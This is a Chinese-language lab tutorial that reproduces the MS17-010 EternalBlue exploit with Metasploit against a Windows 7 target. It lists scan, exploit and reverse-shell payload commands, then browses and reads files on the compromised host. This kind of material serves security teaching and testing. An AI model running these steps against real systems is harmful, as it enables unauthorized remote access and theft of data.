Metasploit攻击——ms17_010漏洞利用

文章目录

  • Metasploit攻击——ms17_010漏洞利用
  • 导论
  • 一、ms17_010简介
  • 二、攻击使用模块
  • 三、、攻击思路
  • 四、具体实施
  • 总结

导论

学习此教程需遵守《中华人民共和国信息安全法》

所有教程仅用于信息安全测试,且在授权的情况下进行,请勿用于其他用途!

一、ms17_010简介

ms17_010漏洞其实就是永恒之蓝,属于一个较早期的windows的一个bug,攻击端口为445端口。
2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
英文为:Eternal Blue,翻译过来就是:永恒之蓝。
其实我们现在使用的电脑,几乎没有这个这个bug了。而且,不久之后,微软公司就针对这个bug发布了漏洞补丁。所以,该漏洞在当前很多系统上已经不存在了。

二、攻击使用模块

本次攻击利用的攻击工具为:Metasploit也就是MSF
主要用到Auxiliary(辅助模块),exploit(攻击模块),payload(攻击载荷),使用辅助模块为MSF中的:

auxiliary/scanner/smb/smb_ms17_010

exploit使用的主要是:

exploit/windows/smb/ms17_010_eternalblue

攻击载荷payload使用:

payload/windows/x64/meterpreter_reverse_tcp

内网测试搭建环境:

攻击机ip:192.168.3.125
靶机ip:192.168.3.127
反弹端口:3333

三、、攻击思路

1、nmap扫描靶机是否存在漏洞,得到漏洞名称
2、通过MSF中的辅助模块,验证漏洞是否存在
3、使用exploit相对应的模块进行攻击
4、设置攻击载荷
5、反弹shell
6、查看权限
7、查看靶机上的文件

四、具体实施

nmap扫描靶机漏洞及开放端口

命令为:nmap --script=vuln -Pn 192.168.3.127
192.168.3.127,为你自己靶机的ip


新开终端,并进入root账户。
我们在使用Linux的时候,你可以开多个终端。
打开msf

root权限:sudo -i
打开msf:msfconsole


查询ms17_010辅助模块

命令:search ms17_010


打开所需要的辅助模块(auxiliary)

命令:use auxiliary/scanner/smb/smb_ms17_010


查询该辅助模块需要设置的一些参数

命令:options


我们可以看到,需要设置的参数有:

靶机IP:RHOSTS
攻击端口:RPORT

这里rport(攻击端口)已经设置完成,我们便不在设置

设置所要攻击的主机ip命令:set rhosts 192.168.3.127
设置攻击端口:set rport 445


设置完成,然后扫描目标ip是否存在该漏洞

从图中我们可以看出,目标ip存在漏洞ms17_010,并且,得到了目标的系统版本:windows7 professional。
确定目标上包含此漏洞,那我们下一步肯定是利用该漏洞啦!
没错,就是exploit(攻击模块)
查询攻击模块:

命令:search ms17_010


我们这里使用的是eternalblue(永恒之蓝)

模块:exploit/windows/smb/ms17_010_eternalblue

打开该攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue


查看该模块需要设置的参数,就是:options/info

命令:options


其实这里也是有两个需要设置的参数,和上面一样的

靶机ip:rhosts
端口:rport
分别是:
set rhosts 192.168.3.127
set rport 445

设置完成,我们还需要设置攻击载荷(payload)
先去查询使用的攻击载荷,这里使用的是反弹shell

模块: windows/x64/meterpreter/reverse_tcp


然后设置payload:

命令:set payload windows/x64/meterpreter/reverse_tcp

然后查看需要设置的参数,命令和上面的一样:options

查询后开始设置,不过这里需要注意的是,我们这里设置的不是靶机的ip和端口,而是攻击机的ip和端口,这里需要注意。我们在使用msf中,需要注意是rhosts还是lhost,或者rports还是lport,这两个是有区别的,前者为被攻击,后者为攻击。

设置反弹ip:set lhost 192.168.3.125
设置反弹端口:set lport 3333

至此,利用ms17_010漏洞的所有都设置完毕,然后我们当然是进行最后一步,运行所有设置,攻击靶机

命令:run/exploit


不出意外的话,一稍等个几分钟,应该会返回如下界面

出现这个界面,说明我们的攻击已经成功了。
然后我们查询系统信息

命令:sysinfo


一般我们攻击肯定是有目的的攻击
我在我的靶机桌面创建了一个名为test的txt文件,我们下面就去,访问他,其中的内容。
使用windows下的shell
我们直接输入:

命令:shell

然后便切换到了windows的命令行也就是我们平时使用的cmd

然后我们列出当前文件夹位置,存在的所有文件

命令:dir


我们都知道,在windows中,桌面其实存在Users下的用户文件夹下面
我这里的用户名为:admin
所以我们使用命令直接切换到admin下

命令:cd Users/admin


在往下切一级文件目录,我们是不是就进入了桌面文件

命令:cd Desktop


查看文件内容

命令:more test.txt

至此,对ms17_010漏洞的复现就讲解完了

总结

其实我们去对目标进行渗透的时候,无非分成下面这几步
1、对目标进行信息收集
2、扫描目标可能存在的的漏洞
3、对漏洞进行测试
4、使用攻击脚本
5、得到想要的结果
当然,实际问题实际分析,要把自己的思维活跃起来!
文中如有错误,请联系笔者修改!
如有侵权,请联系笔者删除!

kali初讲——Metasploit攻击ms17_010复现相关推荐

  1. kali初讲——Metasploit工具MSF初学

    Metasploit--MSF 文章目录 Metasploit--MSF 导论 一.Metasploit简介 二.Metasploit模块介绍 三.MSF基础指令 四.MSF常用模块粗讲 五.msf搜 ...

  2. Kali渗透测试:使用工具Metasploit攻击操作系统

    Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...

  3. Shadow broker=fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP

    0x01 前言 4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)"方程式组织" (Equation Group)使用的极具破坏力的黑客工具,其中 ...

  4. Metasploit攻击win7实例(上)

    一.实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试.攻击. 二.实验环境 图1 实验拓扑图 ...

  5. Metasploit攻击linux实例

    一.实验目的 通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二.实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali ...

  6. 目标URL存在http_host头攻击漏洞复现及修复

    目标URL存在http_host头攻击漏洞复现及修复 文章目录 目标URL存在http_host头攻击漏洞复现及修复 漏洞说明 漏洞描述 危险等级 修复建议 漏洞复现 curl测试方法 BurpSui ...

  7. 使用kali nethunter执行badUSB攻击--基于Rucky工具

    使用kali nethunter执行badUSB攻击–基于Rucky工具 1.下载工具 从F-Droid商店下载Rucky工具 2.攻击语言语法介绍 参考up主无序熵增进行整理:https://www ...

  8. Kali渗透测试——利用metasploit攻击靶机WinXP SP1

    搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...

  9. MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Ro ...

最新文章

  1. 【加强版】js原生实现拖拽效果,这次没有用document的mousedown、mousemove、mouseup事件我们来点实际的(但是有个弊端:拖拽过程中鼠标会变成一个禁用符号,不太友好)
  2. 目标跟踪之camshift---opencv中meanshift和camshift例子的应用
  3. 傅里叶变换时间复杂度
  4. NIPS 2016 | Best Paper, Dual Learning, Review Network, VQA 等论文选介
  5. 腐烂国度2怎么学计算机,腐烂国度2按键操作说明 腐烂国度2怎么操作
  6. gpio_direction_output 与 gpio_set_value
  7. openal 基础知识4
  8. jmeter下TPS插件的安装
  9. Vue 项目 Element-ui CDN引入后体积不变或变大的问题
  10. Java—以当前系统时间生成随机数
  11. 树莓派 40pin IO引脚测试
  12. 棋牌漏洞游戏反汇编译破解修改透视案例分析
  13. 什么是Kurento
  14. 登录起凡是显示计算机拒绝无法连接,怎么解决win10系统无法连接打印机并显示未指定设备问题?...
  15. matlab—赋值具有的非单一 rhs 维度多于非单一下标数
  16. 不求星光灿烂,但愿岁月静好
  17. iOS 内购提示不允许App内购买项目,打开内购方式和检测不允许内购的方法。
  18. 黑盒测试技术(Decision Tables 决策表法,又称判定表法)——软件质量保证与测试
  19. 【分布式微服务】消息中心初步搭建
  20. 6.22 Java练习(根据输入的值计算BMI的值,根据标准判断BMI的值并给出相应健康提示。)

热门文章

  1. 杭州临安区太阳镇农业之旅
  2. 2022年软件测试面试题大全【含答案】
  3. html符号/字符大全(依据官网,有点多,卡)
  4. heapster+influxdb+grafana
  5. 【餐厅点餐平台|二】总体设计
  6. (转)平方根的快速算法(sqrt)
  7. segmentation fault怎么解决_丽江400电话怎么办理
  8. 两根网线可以直接连接吗?
  9. 教你在Linux上写“剧本”,“剧情”.我们只是一个快乐的小编剧,只需要写好剧本,剩下的表演就看我们的linux机群了.
  10. 洗地机到底好不好用,洗地机好还是扫地机器人好